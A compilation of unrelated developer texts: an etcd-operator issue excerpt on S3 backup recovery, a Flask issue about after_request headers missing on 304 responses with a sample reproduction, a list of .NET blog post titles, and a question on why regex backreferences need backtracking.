time="2017-08-12T05:37:59Z" level=info msg="cluster membership: obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:01Z" level=info msg="start watching at 471017" pkg=controller
time="2017-08-12T05:38:04Z" level=info msg="Finish reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:04Z" level=error msg="failed to reconcile: fail to add new member (obfuscated-0002): context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:17Z" level=error msg="failed to update members: context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:30Z" level=error msg="failed to update members: context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="Start reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="running members: obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="cluster membership: obfuscated-0002,obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="Disaster recovery" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="pods are still running (obfuscated-0001). Will try to make a latest backup from one of them." cluster-name=obfuscated pkg=cluster
The moment in the AWS console I deleted all but one of the backups, it started working and properly recovered the backup.
@snarlysodboxer
Can you provide more details about how to reproduce it?
I copied our S3 backups folder from:
${BUCKET_NAME}/v1/${CLUSTER_NAME}/ to
${BUCKET_NAME}/v1/${NAMESPACE}/${CLUSTER_NAME}/
to enable restore from newer version of etcd-operator.
Also copying data in S3 bucket like this is somehow unexpected.
I'm closing since it is going through some invalid path.
@snarlysodboxer Feel free to reopen if you have further questions.
|
GITHUB_ARCHIVE
|
@app.after_request not running when send_directory 304's
Expected Behavior
I am adding headers to the response of every request in my app (a pep 503 style web-app to serve out internally hosted python libraries). The extra header shows up in almost every response.
app = Flask(__name__)
@app.after_request
def extra_header(response):
response.headers['foo'] = 'bar'
return response
### pep 503 endpoint to serve pip installs
@app.route('/packages/<package_name>/<filename>')
def get_package(package_name, filename):
### logic to get library from internal databases
### directory, filename get defined here
return send_from_directory(directory, filename)
Then the users run a pip install index-url=<flask-app url>. Every request/response must include the custom header though or it is blocked by internal gates.
Actual Behavior
When a user runs a pip install 'internal_library>1.2' or similar syntax without a --no-cache-dir option, pip sends a GET to the server with If-None-Match and If-Modified-Since headers. When those match, the web-server responds with status code 304 and headers that include ETag and Cache-Control, but not the custom headers specified in the after_request function.
Environment
Python version: 3.5.1
Flask version: 0.12.2
Werkzeug version: 0.12.2
I can't reproduce this issue as described. Nothing about send_file would be able to bypass after_request. I ran a sample application and observed the custom header with the 304 status code in the response.
from flask import Flask
from flask import send_from_directory
app = Flask(__name__)
@app.after_request
def special_header(response):
response.headers['foo'] = 'bar'
return response
@app.route("/")
def index():
return send_from_directory(".", "LICENSE.rst")
if __name__ == '__main__':
import requests
rv = requests.get(
"http://<IP_ADDRESS>:5000/static/LICENSE.rst",
headers={"If-None-Match": '"1561391683.603-1475-2062749753"'},
)
print(rv.status_code)
print(rv.headers['foo'])
$ FLASK_APP=example flask run
$ python example.py
304
bar
Also note that Flask 0.12 and Werkzeug 0.12 are no longer directly supported. The latest versions are Flask 1.1 and Werkzeug 0.15.
@davidism thanks for the quick response and tips on upgrading versions, looks like the default loads on our plaform-as-a-service tooling are out of date. I upgraded to Flask 1.1 and Wekzeug 0.15 and still see the odd behavior of missing the custom headers only when send_from_directory returns the 304. However, when I create a toy example like your code has and run it on my local machine, I can't replicate the problem.
For posterity, the production app uses a handful of flask extensions including flask_cors, flask_bootstrap, and flask_nav but I couldn't trigger this weird behavior when I included them in the toy example either.
I'm happy to leave this closed for now since I can't replicate the problem outside of our platform-as-a-service environment and just including add_etags=False is a workaround solution. If I can ever replicate the problem I'll re-open this issue.
Thanks again for the help.
|
GITHUB_ARCHIVE
|
The .NET Stacks #47: 🧨 Now with 32 more bits
Make microservices fun again with Dapr
The .NET Stacks #46: 📒 What's new with your favorite IDE
Meet the .NET Upgrade Assistant, Your .NET 5 Moving Company
The .NET Stacks #45: 🔥 At last, hot reload is (initially) here
Instant Feedback Is Here: Introducing Hot Reload in .NET 6
The .NET Stacks #44: 🐦 APIs that are light as a feather
Working with the Blazor DynamicComponent
The .NET Stacks #43: 📅 DateTime might be seeing other people
Use Azure Static Web Apps with Azure DevOps pipelines
The .NET Stacks #42: 🔌 When Active Directory isn't so active
The .NET Stacks #41: 🎁 Your monthly preview fix has arrived
Blast Off with Blazor: Add a shared dialog component
Use C# to upload files to a GitHub repository
The .NET Stacks #40: 📚 Ignite is in the books
Ask About Azure: Why do resource groups need a location?
The .NET Stacks #39: 🔥 Is Dapr worth the hype?
Use API versioning in ASP.NET Core 5
The .NET Stacks #38: 📢 I hope you like announcements
Use Azure Functions with .NET 5
Dev Discussions: Cecil Phillip
The .NET Stacks #37: 😲 When your private NuGet feed isn't so private
Build a Blazor 'Copy to Clipboard' component with a Markdown editor
The .NET Stacks #36: ⚡ Azure Functions and some Microsoft history
How to nuke sensitive commits from your GitHub repository
The .NET Stacks #35: 🔑 Nothing is certain but death and expiring certificates
How to achieve style inheritance with Blazor CSS isolation
The .NET Stacks #34: 🎙 Visual Studio gets an update, and you get a rant
Signed HTTP Exchanges: A path for Blazor WebAssembly instant runtime loading?
The .NET Stacks #33: 🚀 A blazing conversation with Steve Sanderson
How to use configuration with C# 9 top-level programs
Dev Discussions: Steve Sanderson
The .NET Stacks #32: 😎 SSR is cool again
Blast Off with Blazor: Build a search-as-you-type box
The .NET Stacks #31: 🥳 10 things to kick off '21
More with Gruut: Use the Microsoft Bot Framework to analyze emotion with the Azure Face API
Blast Off with Blazor: Prerender a Blazor Web Assembly application
The .NET Stacks #30: 🥂 See ya, 2020
Blast Off with Blazor: Build a responsive image gallery
Blast Off with Blazor: Integrate Cosmos DB with Blazor WebAssembly
The .NET Stacks #29: More on route-to-code and some Kubernetes news
Use local function attributes with C# 9
Automate a Markdown links page with Pinboard and C#
The .NET Stacks, #28: The future of MVC and themes of .NET 6
Use ASP.NET Core route-to-code for simple JSON APIs
The .NET Stacks #27: Giving some 💜 to under-the-radar ASP.NET Core 5 features
Use Azure Functions, Azure Storage blobs, and Cosmos DB to copy images from public URLs
Blast Off with Blazor: Isolate and test your service dependencies
The .NET Stacks #26: .NET 5 has arrived, let's party
Simplify your ASP.NET Core API models with C# 9 records
Use OpenAPI, Swagger UI, and HttpRepl in ASP.NET Core 5 to supercharge your API development
The .NET Stacks #25: .NET 5 officially launches tomorrow
Blast Off with Blazor: Use .NET 5 to update the HTML head from a Blazor component
The .NET Stacks #24: Blazor readiness and James Hickey on Coravel
Are C# 9 records immutable by default?
Dev Discussions - James Hickey
The .NET Stacks #23: .NET 5 support, migration tools, and links
Blast Off with Blazor: Learn components and testing with a custom 404 page
Blast Off with Blazor: Get to know Blazor and our project
The .NET Stacks #22: .NET 5 RC 2 ships, .NET Foundation all hands, and links
C# 10 First Look: Constant string interpolation
Improve rendering performance with Blazor component virtualization
The .NET Stacks #21: Azure Static Web Apps, .NET 6 feedback, and more!
Blast Off with Blazor, Azure Functions, and Azure Static Web Apps
How to Docker with .NET: Getting Started
The .NET Stacks #20: Route to Code, IdentityServer, community links
The .NET Stacks #19: An Ignite recap and F# with Phillip Carter
The .NET Stacks #18: RC1 is here, the fate of .NET Standard, and F# with Isaac Abraham
Dev Discussions - Phillip Carter
Get to know your .NET streamers
The .NET Stacks #17: EF Core 5, Blazor + CSS, and community!
Dev Discussions - Isaac Abraham
The .NET Stacks #16: App trimming and more on ML.NET
Use CSS isolation in your Blazor projects
The .NET Stacks #15: The final preview and ML.NET with Luis Quintanilla
Dev Discussions - Luis Quintanilla (2 of 2)
NDepend: Boost Your Team's Code Quality
The .NET Stacks #14: Checking in on NuGet changes, many-to-many in EF Core, community roundup, and more!
Dev Discussions - Luis Quintanilla (1 of 2)
Use Project Tye to simplify your .NET microservice development experience (part 2)
The .NET Stacks #13: .NET 5 Preview 8 and Blazor, interview with Scott Addie, community links!
Use Project Tye to simplify your .NET microservice development experience (part 1)
The .NET Stacks #12: Azure DevOps or GitHub Actions, .NET Foundation results, community links!
Dev Discussions - Scott Addie
C# 9: Records Revisited
The .NET Stacks #11: Newtonsoft, async void, more with Jeremy Likness, more!
The .NET Stacks #10: .NET 5 taking shape, how approachable is .NET, a talk with Jeremy Likness, more!
Dev Discussions - Jeremy Likness (2 of 2)
Talk with Groot using the Microsoft Bot Framework and Azure sentiment analysis
The .NET Stacks #9: Project Coyote, new Razor editor, and more!
Dev Discussions - Jeremy Likness (1 of 2)
C# 9: Putting it all together with a scavenger hunt
The .NET Stacks #8: functional C# 9, .NET Foundation nominees, Azure community, more!
C# 9: Answering your questions
C# 9 Deep Dive: Target Typing and Covariant Returns
The .NET Stacks #7: Azure SDKs, testing, community roundup, more!
Dev Discussions - Michael Crump on contributing to the Azure community
C# 9 Deep Dive: Top-Level Programs
C# 9 Deep Dive: Pattern Matching
C# 9 Deep Dive: Records
The .NET Stacks #6: Blazor mobile bindings, EF update, ASP.NET Core A-Z, more!
C# 9 Deep Dive: Init-only features
Dev Discussions - Shahed Chowdhuri talks about his ASP.NET Core A-Z blog series
On simplifying null validation with C# 9
The .NET Stacks #5: gRPC-Web, play with C# 9, .NET Foundation, community roundup!
Reduce mental energy with C# 9
Party in the cloud with feature flags and Azure App Configuration
The .NET Stacks #4: EF Core, PresenceLight, community roundup!
Dev Discussions - Isaac Levin talks PresenceLight
The .NET Stacks #3: Native feature flags, local Kubernetes, community roundup!
Implement custom filters in your ASP.NET Core feature flags
The .NET Stacks #2: Project Tye, YARP, news, and community!
Using Microsoft.FeatureManagement.AspNetCore to filter actions and HTML
Introducing the Microsoft.FeatureManagement library
The .NET Stacks #1: Microsoft Build, announcements galore!
Introducing The .NET Stacks weekly newsletter
What I'm Reading (Week of 5/11/20)
What I'm Reading (Week of 5/4/20)
First Look: C# Source Generators
What I'm Reading (Week of 4/27/20)
What I'm Reading (Week of 4/20/20)
Compress Images in GitHub Using Imgbot
Tweeting New GitHub Pages Posts from GitHub Actions
What I'm Reading (Week of 4/14/20)
C# 8, A Year Late
What is a shell? 🐚 adalah kerang ajaib?
How to rename a Git branch
Keep Those Boolean Conditionals Simple
How 2018 Went
Level Up Your GitHub Experience with Chrome Extensions
Razor Support for ASP.NET Core Apps in Visual Studio Code
Share Blazor Components with Shared Class Libraries
GitHub tip: You don't need that .git extension to clone
Full-Stack Development in Visual Studio Code with ASP.NET Core
Using Anchor Links in Markdown
The AppCache API: Is It Worth It?
Publish your localhost with the World using Localtunnel
Exploring the Web Storage APIs
Exploring the Geolocation API
|
OPCFW_CODE
|
What should we do about dead listings?
There are a few pending flags on posts for applications/scripts/libraries where the advertised program no longer works, sometimes meaning that the link to the source code and/or binary is also dead.
It's not helpful for visitors to Stack Apps to find something that they can't even use, so it seems reasonable to do something about these posts…but I'm undecided as to what. Options include:
Outright deletion
Closing with another custom reason
Locking with the historical significance reason
Editing the post to include a warning
Merely posting a comment explaining the status in the hope someone happen to see it
Shrug and do nothing
Some other option I didn't consider
I don't have very strong feelings at the moment which one is best, so I'm open to hearing about what everyone feels the approach to these dead posts should be.
Yes, obsolete listings (script / app / library) should at the very least, be made obvious at a glance and ideally obvious in search results.
For reference, there are currently only 754 listings that are not placeholders (more on placeholders, below).
Delete sparingly; removing legacy content should be a last resort.
Posts can have historical value.
Even obsolete posts can provide useful ideas and/or code.
Stack Exchange does and should strive to preserve high scoring posts that were once valid. ("There are a large number of views, upvotes and inbound links on the post," etc.)
EXCEPTION: Many placeholder questions should probably be deleted. More on this below.
Keep listings with, say, 5 score irregardless.
Only lock posts if they don't meet today's guidelines for acceptable posts (and have too much score to delete). My SWAG is that no listing will merit locking.
Otherwise, all listings should be updateable by whomever has the time, motivation, and skill to do so.
Closing would be ideal, because it has that nice banner at the top and has good mechanisms in place for dealing with such posts.
Note that this might trigger the Roomba on a few posts (currently 4 candidates that aren't already on hold) -- which may or may not be a good thing.
Tagging with obsolete. This is good and can help with both search and signaling listings that might get closed.
Plus: Anyone can do it or suggest it.
Minus 1: it's not enough to let the new/casual user realize that the listing is now salvage and/or historical.
Minus 2: Easy to remove (erroneously).
Leading the title with "OBSOLETE". This has the same advantages and disadvantages as tagging, but sends a much clearer signal to searchers.
Proposed Actions:
EDIT all such listings with the title prefix "OBSOLETE - ", and the tag obsolete. This can be done immediately and will help with all further actions.
Get that custom close reason added and use it.
Delete and/or lock if really deserved.
Possibly start closing abandoned placeholder apps as previously discussed, as these are an obvious source of (usually) no-value clutter.
Some of the placeholders that should be closed should also be deleted and since they have may have a (pity/newbie) score of 1, won't get Roomba'd.
Per this SEDE query, here is a list of placeholders that perhaps should be closed. Update: the original list, from July 2018, have now all been closed.
Updatier, of the 13 original very-obsolete posts, all have now been closed:
These have been closed but need to be deleted (but may Roomba):
Stacked Up Comments [Placeholder]
Stack Exchange v2.2 PHP API Client
These have been closed and Roomba'd. Good Job! (Need 10K to see):
AnswerMachine (Placeholder)
Developing a new parenting app (Placeholder)
Browse StackOverflow community from iOS devices (placeholder)
Post to have write access (Placeholder)
PhoneGap Stack Overflow app (Placeholder)
Required Post for Write Access for android (Placeholder)
(Placeholder) A test app
Stack Exchange Eclipse Plugin (Placeholder)
Test Application Post (Placeholder)
Question analysis application (placeholder)
Placeholder for my application
I would vote for the historical lock option.
Straight deletion is harsh and someone somewhere may still need the information.
Creating a custom close reason could conceivably see posts erroneously voted closed.
A warning would have to be consistently worded for all posts to avoid any possibility of confusion in future readers.
A comment, with the best will in the world, won't get noticed.
Doing nothing doesn't address the problem.
Historical locks should only be used within the guidelines; and I suspect that very few of these obsolete posts will merit such.
|
STACK_EXCHANGE
|
Many developers see AWS Lambda as the serverless path of the future, eventually leading to NoOps -- automating the underlying IT environment to remove the human element of an IT team.
But, as with many new technologies, including the move to cloud, many enterprises are unsure how a serverless computing architecture will benefit them, and they remain unwilling to implement the organizational and financial changes necessary to go serverless. Instead, they opt for services such as AWS Lambda to solve back-end problems with traditional cloud deployments, taking management tasks away from developers who are freed to write code, while the service handles the underlying resources. Developers using AWS Lambda can alleviate application traffic, for example, or send text alerts when a certain event takes place in the cloud. But not all businesses are making the leap and using AWS Lambda.
Still, some savvy enterprises are taking a more heavily integrated approach to using AWS Lambda. Localytics, a Boston-based mobile engagement platform that focuses on analyzing mobile and web application usage, depends on a host of Amazon Web Services' offerings, including AWS Lambda, DynamoDB and Elastic MapReduce, to deliver services to customers. We spoke to Mohit Dilawari, senior engineering director, about how the company uses Lambda in its cloud deployment and where AWS could improve the service.
How does AWS Lambda help you achieve your IT objectives?
Mohit Dilawari: We have been an early adopter of Lambda for a while. The first Lambda [implementation] was while it was in beta; we were using [AWS Lambda] to process some of our event streams. Part of our offering is to give straight-up analytics on app usage. What we end up doing is processing data points or events from mobile apps within Amazon. We use Lambda as a way to process some of that data to glean interesting information about users.
We've connected Lambda to Kinesis. What we're putting onto the Kinesis Stream is all these data points that customers send to us. The Lambda [function] processes the data points and gets intelligent information out of there and stores it onto a [DynamoDB] database. We have about 22 Lambda [functions] in production -- we have chat bots and Slack bots that we use, and we have Lambda that helps us process data [and ones] that process S3 [Simple Storage Service] files. We use Lambda to its fullest extent.
What's been the biggest challenge when adopting a serverless approach?
Dilawari: It is still a black box -- and that's the plus and minus. You go to Lambda because you don't want to deal with infrastructure. But when there are things going wrong, you're not quite sure what happened. Sometimes, log diving doesn't get you the answer you want. That is one aspect of it.
The second aspect, I would say, impacts the Slack bot integration, where you have these cold starts. There are times when, if you haven't invoked a Lambda [function] within a certain amount of time, it will take a while for the virtual machine to fire up, accept and process your request. A lot of times, Slack requests require a response within three seconds; if you're not able to respond within three seconds, you'll time out and you'll have to reissue the command. So, it gives a less-than-ideal experience on your Slack bot.
There are a lot of pros to [Lambda], but there are certain use cases where it wouldn't be my first go-to. When it comes to the Rail stack, Python, Django, even with Scala Play -- these are frameworks and tooling that have been around for many years, and they're highly optimized for building out web apps. You can do this with Lambda, but the tooling there is still a little immature, and it's a lot more work. With Lambda, it takes a little bit of time; you've got to add in authentication and piecemeal everything together.
What other serverless computing technologies did you consider?
Mohit Dilawarisenior engineering director, Localytics
Dilawari: We looked at Iron.io. We also looked at Google [Cloud] Functions. But we are an Amazon shop at the end of the day, and we trust Amazon. We have a really good relationship with them; we're not looking to add in any third parties. We don't want to put our [service-level agreements] on the line when a third party goes down. Amazon's got the huge advantage, because what they're doing, which is super smart, is building this entire ecosystem. I think they see Lambda as something that is the future of their platform. So, I think they're going to double down on this, or triple down on it.
How complex is it to tie other services with Lambda?
[Serverless] released Java Lambda as well. That's extremely exciting for us, because we are a Scala shop, and we'd love to continue writing Scala. Scala definitely works well when writing in the Java ecosystem. Some of our use cases don't need an API; they're S3 notifications. So, we can still leverage Serverless for that.
Are you worried about AWS lock-in with Lambda?
Dilawari: With a framework like Serverless, if we were to move to Google or anything else, I think we'd be able to migrate over. I don't think it would be a transparent migration, but I think you can move over. I wouldn't be as worried about that.
How to configure AWS Lambda functions
Visualize Lambda deployments with a graph database
Generate an HTTP response header with Lambda
|
OPCFW_CODE
|
generating canonical list of tuples?
joshm at taconic.net
Fri Jan 4 08:24:19 CET 2002
> Option 1: Recursion. Recursion will cause a memory explosion when the
> limit and dimension begin to grow, and so this isn't a good solution.
> Option 2: Exec. Construct a line of python code dynamically based on the
> above example, and exec it. Would this be considered a good solution?
> Option 3: ???
Ok, so I've tried a function which brute force cranks out the tuples by
adding one to the last element, carrying it over, etc. And I wrote the exec
method. And I wrote the recursion method. The exec runs at least six times
faster than the brute force method. Recursion causes memory to dump even
sooner, since there are tons of redundant lists to gc. The code for the
exec method is as follows:
def genWhiteTuples(total, blocks):
# produce the set of all tuples with "blocks" elements, where
# the sum of the elements is less than or equal to "total"
# for example, genWhiteTuples(5,3) returns
# [ (1,1,1), (1,1,2), (1,1,3), (1,2,1), (1,2,2),
# (1,3,1), (2,1,1), (2,1,2), (2,2,1), (3,1,1) ]
# create an evil list comprehension to compute...
# [ (x1,x2,x3,...) for x1 in range(1,f+1) for x2 in range(1,f+2-x1)
# for x3 in range(1,f+3-x1-x2) ... ]
# where f is the max value of the first element of the tuple
f = total - blocks + 1
sub = ''
elements =
clauses =
for i in range(1, blocks + 1):
elements.append('x%d' % i)
clauses.append('for x%d in range(1, f+%d%s)' % (i,i,sub) )
sub = '%s-x%d' % (sub, i)
if len(elements) == 1:
tup = '(%s,)' % elements
tup = '(' + ','.join(elements) + ')'
cmd = 'good = [ %s %s ]' % (tup, ' '.join(clauses) )
This is pretty cool, but also pretty unmaintainable. Is there a better
solution? By the way, trying to compute genWhiteTuples(39, 6) caused my
machine to run out of paging space after burning about 500MB. :-) I'm
still working on a better algorithm than this, since even with making this
run better, it'll still consume the same RAM.
-----= Posted via Newsfeeds.Com, Uncensored Usenet News =-----
http://www.newsfeeds.com - The #1 Newsgroup Service in the World!
-----== Over 80,000 Newsgroups - 16 Different Servers! =-----
More information about the Python-list
|
OPCFW_CODE
|
Windows Ce Netbook Applications 23
WinCESoft Software for Windows CE, .. Direct X for Windows CE.. .
Msdn forums - Windows Embedded Compact Platform Development
Windows Embedded Compact Platform Development .. a Windows CE driver? then you .. one for CE native applications development and another one .
Windows-CE Based FirstView PC-706 Netbook Spotted at CES
Windows-CE Based FirstView PC-706 Netbook .. is bright and crisp and fortunately the built-in Windows CE applications really maximize the limited .
Windows Ce 6 0 - Free downloads and reviews - CNET .
windows ce 6 0 free download - Learn Visual Basic 6, Facebook for Windows Mobile 6, Windows CE 5.0: Standard Software Development Kit (SDK), and many more programs
Steps needed to install Windows Embedded CE 6.0 from .
Steps needed to install Windows Embedded CE 6.0 .. (Does TUX work for non driver unmanaged applications?) .. "Windows Mobile and Windows Embedded CE .
Netbook - Free downloads and reviews - CNET Download.com
netbook free download - Netbook Optimizer, Netbook Tracer, Ubuntu Netbook Edition, .. View all Windows apps.. Popular Android Apps TubeMate 3.. TubeMate.
Portable apps on Notebook running Windows CE 5.0 .
Portable apps on Notebook running Windows CE 5.0 .. Netbook with CE .. .. prices and where to buy or download have any relevance to portable applications.
Netbook - Wikipedia
.. weight, a 9 in (23 cm .. with the availability of a 'netbook' version of Windows XP, .. Windows CE has also been used in netbook applications, .
windows ce 7.0
Applications can then be written which .. Another issue that has arisen with Windows CE is that different host devices support .
Windows ce 7 Applications/software? MajorGeeks.Com .
Windows ce 7 Applications/software? Discussion in 'Software' started by Nexus, Jun 6, 2012.. Nexus Sergeant.. .. You want a netbook that runs windows, not windows CE. 3b9d4819c4
john elliott insights in jazz pdf 14
sentirse bien david burns ebook 59
jim murphy the great fire pdf 19
net monitor for employees professional 4.8.8 keygen 12
kamasutra book gujarati pdf free 28
download solution manual manufacturing engineering and technology kalpakjian sixth edition.66
3ds emulator 1.1.7 bios file 47
file scavenger 4.2 crack 36
free maya rigged models torrent 11
parallel computing quinn pdf 158
|
OPCFW_CODE
|
Mirroring popular linux package manager repositories
I've started collecting a list of the most widespread linux distros and their package repositories, including size, update frequency, methods of mirroring, and lists of mirrors, with the aim of looking for repeating patterns that we can focus on supporting
Spoiler: All the linux package managers use regular rsync runs for mirroring, sometimes via a custom script that checks a last modified file time before attempting to download updates.
Distro
Size
Frequency
Debian
2.4TB
6 Hours
Ubuntu
1.1TB
6 Hours
Fedora
1.5TB
10 mins
CentOS
400GB
6 Hours
FreeBSD
1.4TB
24 Hours
openSUSE
3TB
6 Hours
Arch
130GB
1 Hour
Gentoo
550GB
4 Hours
Alpine
560GB
1 Hour
Debian
Mirrors: https://www.debian.org/mirror/list
Mirroring method: ftpsync (rsync under the hood)
Mirroring docs: https://www.debian.org/mirror/ftpmirror
Total size: 2.4TB
Update frequency: 6 hours
Ubuntu
Mirrors: https://launchpad.net/ubuntu/+archivemirrors
Mirroring method: https://wiki.ubuntu.com/Mirrors/Scripts (rsync)
Mirroring docs: https://wiki.ubuntu.com/Mirrors
Total size: 1.1TB
Update frequency: 6 hours
Fedora
Mirrors: https://admin.fedoraproject.org/mirrormanager/
Mirroring method: quick-fedora-mirror (rsync)
Mirroring docs: https://fedoraproject.org/wiki/Infrastructure/Mirroring
Total size: 1.5TB
Update frequency: 10 minutes
CentOS
Mirrors: https://www.centos.org/download/mirrors/
Mirroring method: rsync
Mirroring docs: https://wiki.centos.org/HowTos/CreatePublicMirrors
Total size: 400GB
Update frequency: 6 hours
FreeBSD
Mirrors: https://www.freebsd.org/doc/handbook/eresources-web.html
Mirroring method: rsync
Mirroring docs: https://www.freebsd.org/doc/en_US.ISO8859-1/articles/hubs/mirror-howto.html
Total size: 1.4 TB
Update frequency: daily
openSUSE
Mirrors: https://mirrors.opensuse.org/
Mirroring method: rsync
Mirroring docs: https://en.opensuse.org/openSUSE:Mirror_howto
Total size: 3TB
Update frequency: 6 hours
Arch Linux
Mirrors: https://www.archlinux.org/mirrorlist/all/
Mirroring method: rsync
Mirroring docs: https://wiki.archlinux.org/index.php/Mirrors
Total size: 130GB
Update frequency: 1 hour
Gentoo
Mirrors: https://www.gentoo.org/support/rsync-mirrors/
Mirroring method: rsync
Mirroring docs: https://wiki.gentoo.org/wiki/Project:Infrastructure/Mirrors/Source
Total size: 550GB
Update frequency: 4 hours
Alpine
Mirrors: https://mirrors.alpinelinux.org/
Mirroring method: rsync
Mirroring docs: https://wiki.alpinelinux.org/wiki/How_to_setup_a_Alpine_Linux_mirror
Total size: 560GB
Update frequency: 1 hour
This will get merged into #78. FYI n stuff.
|
GITHUB_ARCHIVE
|
In yesterday’s email, I pontificated about the challenges and potential payoffs presented when taking on complex UI engineering work like that demonstrated in this article about the Google Photos web app.
I find this case study fascinating for a number of reasons, so I’m going to indulge in some more pontification today.
The team’s ambitious vision for the product involved trying to satisfy multiple goals:
- Be able to jump to any part of a huge photo library
- Fill the width of the browser and preserve the aspect ratio of each photo
- 60fps scrolling
- Instantaneous feel
Imagine for a minute that you’ve been hired as lead UI engineer on this project. You’d be forgiven for running away somewhere for a bit of a cry and some alone time once you’d seen that list of requirements.
Believe me, this is a good sign, because it means you understand the constraints of the medium, platform and the diverse capabilities of users’ devices.
For me, once I’d got the initial shock out of my system, my problem-solving and reasoning systems would kick in, resulting in a rapid-fire set of thoughts aimed at reducing the size of this challenge.
My thoughts would likely include, in no particular order:
- This will never work.
- We could maybe achieve 2-3 of these at one time, but not all of them.
- Achieving all of these will require some genuine abuse of the web platform and some disgusting hacks that will make me feel ashamed, assuming they’re even possible.
- Maybe we could do all of this in WebGL? Or canvas? Or using that rendering library that got millions in funding and then disappeared? What was it called?
- Assuming performance is the most important feature, can we treat number 2. as a nice-to-have and quietly ditch it later? Would that even make it easier?
- What about that career change I was considering?
- I need to go away and read up on scrolling and rendering performance.
- We’re going to need to make the case for lots of time experimenting to get anywhere close.
The very worst response to facing these requirements is to promise that they will be achieved.
The second worst response is to provide a time-based estimate of how long it will take to achieve it.
When you’re embarking on something that is not a solved problem and doesn’t have clear patterns of execution that are well documented, you’re taking on a lot of risk.
And the best way to mitigate risk like this is to experiment progressively. Treat it as team learning exercise. Identify the heart of the challenge - the riskiest aspect - and go at it full on, until you have a clear understanding of its shape and nature. Then move outwards to tackle other aspects and see how doing so impacts other goals.
Are some of the goals mutually exclusive? Is solving one far more costly than others? How far are you stretching the capabilities of the platform? How will this impact real users?
Then you can start discussing the pros and cons of proceeding, for project risk, for upside to users, for maintenance costs, and so on.
Ultimately, you have to remember that the article is likely to be an example of survivor and hindsight biases. The team successfully achieved their ambitious goals, and so decided to write about the work they did, after they did it. The same is far less likely to happen for similarly ambitious but unsuccessful projects.
We can learn a huge amount by taking on difficult work like this, because it stretches us. But we can only do so in a safe space where a successful outcome includes outright failure.
All the best,
|
OPCFW_CODE
|
Implement renderer screenshot automation
This change proposes a strategy to automatically collect updated screenshots for third party renderers over time to satisfy the requirements of #358 . This tooling will provide critical support as we approach #309 and #360. Some high level details of the change:
A Filament-based glTF renderer (gltf_renderer) has been introduced
gltf_renderer is a mash-up of the gltf_viewer and frame_recorder samples in the Filament repo
Generates a PNG representing a staged model given a glTF, a cmgen-produced IBL, a width and a height
gltf_renderer is built by applying a patch on top of the Filament project repository and running Filament's build script
Should serve as a baseline for future staging customizations
Screenshots can be updated by invoking npm run update-screenshots
Uses fidelity test configuration to determine what needs to be rendered / updated
Attempts to build cmgen and gltf_renderer from scratch if they are not available
Generates IBL artifacts with cmgen if they are not available
Eventually this command should encompass more renderers as we discover how best to automatically collect their render results
A startup/provisioning script has been introduced to enable an Ubuntu VM or similar environment to produce screenshots
Cloud infrastructure has been provisioned to automatically produce screenshot update PRs based on daily checks performed at midnight (see below for details)
Automation strategy
In order to minimize the effort required to keep screenshots up to date, and also to reduce the likelihood of frustration arising from inconsistencies in local dev environments, cloud infrastructure has been introduced to automate screenshot collection updates.
Virtual infrastructure limitations
Initially, I expected that we could accomplish this as a specialized CI build on Travis. However, Filament requires a minimum OpenGL version of 4.1 to run. Initial investigation of Travis options here proved discouraging. It seems that a lot of standard virtual infrastructure does not support a recent enough version of OpenGL due to limitations of VMWare support in the Mesa GL driver.
In the end I was able to build Filament in Travis, but we are unable to use Travis to render because Filament cannot find a suitable rendering backend.
Enter GCP
Thankfully, the requirements for our automation are pretty basic: provision an environment to build Filament (and other renderers in the future), take some screenshots and then make a PR.
I turned to GCP in the hopes that a VM with attached GPU would offer a suitable version of OpenGL for rendering Filament. And I'm happy to report: it does.
The infrastructure that has been put in place is modeled after this one diagramed in a Google Cloud Scheduler tutorial:
The arrangement specific to our own infrastructure can be described as follows:
A VM instance rendermatic is presumed to have been created with an attached GPU, and with the startup script introduced by this change.
Every day at midnight, a PubSub message is dispatched to awaken rendermatic
PubSub message is observed by a designated Cloud Function, which starts the rendermatic VM
As rendermatic boots up, the startup script runs, producing screenshots and crafting a PR if necessary
As the startup script concludes, rendermatic is powered off
If there was any problem leading to rendermatic not being powered off, a subsequently scheduled PubSub message at 2 AM invokes a final Cloud Function that shuts down the VM
Generated update PRs
The automation infrastructure produces PRs if (and only if) there are changes among the fidelity test goldens checked into the repository. Here is an example of what the automatically crafted PRs look like:
It is expected that a human reviewer will look over the automatically generated PR before it is merged so that we an stay on top of any significant changes that occur in third party renderers over time.
Fixes #358
This has been rebased to include the changes (and notably the fidelity test) that landed in #338
I discovered that the Filament renderer does not produce consistently sized render PNGs. On so-called high-DPI displays, the PNGs can be a multiple of the dimensions passed in by the invoker. I'm working on extending the Filament patch to address this.
In https://github.com/GoogleWebComponents/model-viewer/pull/351/commits/576c64ad370752c60ec49c9017230f956cf7f0d5 I expanded FilamentApp to support a callback for configuring the SDL_Window instance. This affords the gltf_renderer app an opportunity to decide if the window should be resized on account of UI scaling factor. There is no consistent notion of UI scaling factor, so it is inferred by comparing the "display" size (the absolute pixel dimensions of the rendered image) and the "window" size (the requested dimensions of the window in scaled pixels).
Good find on the scaling! I've added comments, but looking back through them they're not blockers.
|
GITHUB_ARCHIVE
|
I read http://swtch.com/~rsc/regexp/regexp1.html and in it the author says that in order to have backreferences in regexs, one needs backtracking when matching, and that makes the worst-case complexity exponential. But I don't see exactly why backreferences introduce the need for backtracking. Can someone explain why, and perhaps provide an example (regex and input)?
